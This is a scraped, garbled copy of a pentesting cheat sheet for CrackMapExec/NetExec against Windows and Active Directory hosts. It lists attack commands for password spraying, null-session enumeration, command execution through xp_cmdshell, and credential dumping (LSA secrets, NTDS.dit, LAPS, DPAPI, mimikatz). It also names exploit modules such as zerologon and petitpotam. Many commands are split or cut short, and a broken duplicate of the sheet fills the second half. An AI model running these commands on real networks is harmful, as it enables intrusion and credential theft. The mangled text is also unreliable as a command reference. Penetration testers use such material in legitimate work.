CrackMapExec and NetExec Cheat Sheet

CrackMapExec and NetExec Cheat Sheet
seriotonctf.github.io/2024/03/07/CrackMapExec-and-NetExec-Cheat-Sheet/
A cheat sheet for CrackMapExec and NetExec, featuring useful commands and modules for different
services to use during Pentesting
CrackMapExec: https://github.com/byt3bl33d3r/CrackMapExec (no longer maintained)
1/10
NetExec: https://github.com/Pennyw0rth/NetExec
Installation: https://www.netexec.wiki/getting-started/installation
The same commands for crackmapexec would also work for NetExec
Other names: cme, nxc
Enumeration
Initial Enumeration
bash
crackmapexec smb
target
Null Authentication
bash
crackmapexec smb target -u ''

-p ''
Guest Authentication
bash
crackmapexec smb target -u 'guest'

-p ''
List Shares
bash
crackmapexec smb target -u '' -p '' --

shares
2/10
bash
crackmapexec smb target -u username -p password --

shares
List Usernames
bash
crackmapexec smb target -u '' -p '' --

users
bash
crackmapexec smb target -u '' -p '' --rid-

brute
bash

users
Local Authentication
bash

local-auth
Using Kerberos
bash
crackmapexec smb target -u username -p

password -k
Check for hosts that have SMB signing disabled
3/10
bash
crackmapexec smb target(s) --gen-relay-list

relay.txt
Spraying
Password Spray
bash
crackmapexec smb target -u users.txt -p password --continue-on-

success
bash
crackmapexec smb target -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-

success
bash
crackmapexec ssh target(s) -u username -p password --continue-on-

success
SMB
All In One
bash
crackmapexec smb target -u username -p password --groups --local-groups --loggedon-users --

rid-brute --sessions --users --shares --pass-pol
Spider_plus Module
4/10
bash
crackmapexec smb target -u username -p password -M

spider_plus
bash
crackmapexec smb target -u username -p password -M spider_plus -o

READ_ONLY=false
Dump a specific file

bash
crackmapexec smb target -u username -p password -k --get-file target_file output_file --share

sharename
LDAP
Enumerate users using ldap

bash
crackmapexec ldap target -u '' -p '' --

users
All In One
bash
crackmapexec ldap target -u username -p password --trusted-for-delegation --password-not-

required --admin-count --users --groups
WMI
5/10
bash
cme wmi target(s) -d domain -u username -p password [-H hash] -M

mimikatz
MSSQL
Authentication
bash
crackmapexec mssql target -u username -p

password
Execute commands using xp_cmdshell
-X for powershell and -x for cmd
bash
crackmapexec mssql target -u username -p password -x

command_to_execute
Get a file
bash
crackmapexec mssql target -u username -p password --get-file output_file

target_file
Secrets Dump
Dump LSA secrets

bash
crackmapexec smb target -u username -p password --local-auth

--lsa
6/10
gMSA
bash
crackmapexec ldap target -u username -p password --gmsa-convert-

id id
bash
crackmapexec ldap domain -u username -p password --gmsa-decrypt-lsa

gmsa_account
Group Policy Preferences

bash

gpp_password
Dump LAPS password

bash
crackmapexec smb target -u username -p password -

-laps
Dump dpapi credentials

bash
crackmapexec smb target -u username -p password --laps --

dpapi
Dump NTDS.dit
7/10
bash
crackmapexec smb target -u username -p password -

-ntds
Asreproast
bash
crackmapexec ldap target -u username -p password --asreproast

asrep.txt
Bloodhound
bash
crackmapexec ldap target -u username -p password --bloodhound -ns ip --

collection All
Useful Modules
Webdav
Checks whether the WebClient service is running on the target
bash
crackmapexec smb ip -u username -p password -M

webdav
Veeam
Extracts credentials from local Veeam SQL Database
bash

veeam
8/10
slinky
Creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in
all shares with write permissions
bash

slinky
ntdsutil
Dump NTDS with ntdsutil
bash

ntdsutil
ldap-checker
Checks whether LDAP signing and binding are required and/or enforced
bash
cme ldap target -u username -p password -M ldap-

checker
bash

zerologon
bash

petitpotam
9/10
bash

nopac
Check the MachineAccountQuota

bash
crackmapexec ldap target -u username -p password -

M maq
ADCS Enumeration
bash
crackmapexec ldap target -u username -p password -M

adcs
Author: serioton
Link: https://seriotonctf.github.io/2024/03/07/CrackMapExec-and-NetExec-Cheat-Sheet/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
cheatsheet
10/10

CrackMapExec and NetExec Cheat Sheet

Uploaded by

CrackMapExec and NetExec Cheat Sheet

Uploaded by

CrackMapExec and NetExec Cheat Sheet

CrackMapExec: https://github.com/byt3bl33d3r/CrackMapExec (no longer maintained)

Other names: cme, nxc

crackmapexec smb target -u ''

crackmapexec smb target -u 'guest'

crackmapexec smb target -u '' -p '' --

crackmapexec smb target -u username -p password --

crackmapexec smb target -u '' -p '' --

crackmapexec smb target -u '' -p '' --rid-

crackmapexec smb target -u username -p password --

crackmapexec smb target -u username -p password --

crackmapexec smb target -u username -p

Check for hosts that have SMB signing disabled

crackmapexec smb target(s) --gen-relay-list

crackmapexec smb target -u users.txt -p password --continue-on-

crackmapexec smb target -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-

crackmapexec ssh target(s) -u username -p password --continue-on-

crackmapexec smb target -u username -p password --groups --local-groups --loggedon-users --

crackmapexec smb target -u username -p password -M

crackmapexec smb target -u username -p password -M spider_plus -o

Dump a specific file

crackmapexec smb target -u username -p password -k --get-file target_file output_file --share

Enumerate users using ldap

crackmapexec ldap target -u '' -p '' --

crackmapexec ldap target -u username -p password --trusted-for-delegation --password-not-

cme wmi target(s) -d domain -u username -p password [-H hash] -M

crackmapexec mssql target -u username -p

Execute commands using xp_cmdshell

-X for powershell and -x for cmd

crackmapexec mssql target -u username -p password -x

crackmapexec mssql target -u username -p password --get-file output_file

Dump LSA secrets

crackmapexec smb target -u username -p password --local-auth

crackmapexec ldap target -u username -p password --gmsa-convert-

crackmapexec ldap domain -u username -p password --gmsa-decrypt-lsa

Group Policy Preferences

crackmapexec smb target -u username -p password -M

Dump LAPS password

crackmapexec smb target -u username -p password -

Dump dpapi credentials

crackmapexec smb target -u username -p password --laps --

crackmapexec smb target -u username -p password -

crackmapexec ldap target -u username -p password --asreproast

crackmapexec ldap target -u username -p password --bloodhound -ns ip --

crackmapexec smb ip -u username -p password -M

crackmapexec smb target -u username -p password -M

crackmapexec smb ip -u username -p password -M

crackmapexec smb ip -u username -p password -M

cme ldap target -u username -p password -M ldap-

crackmapexec smb target -u username -p password -M

crackmapexec smb target -u username -p password -M

crackmapexec smb target -u username -p password -M

Check the MachineAccountQuota

crackmapexec ldap target -u username -p password -

crackmapexec ldap target -u username -p password -M

You might also like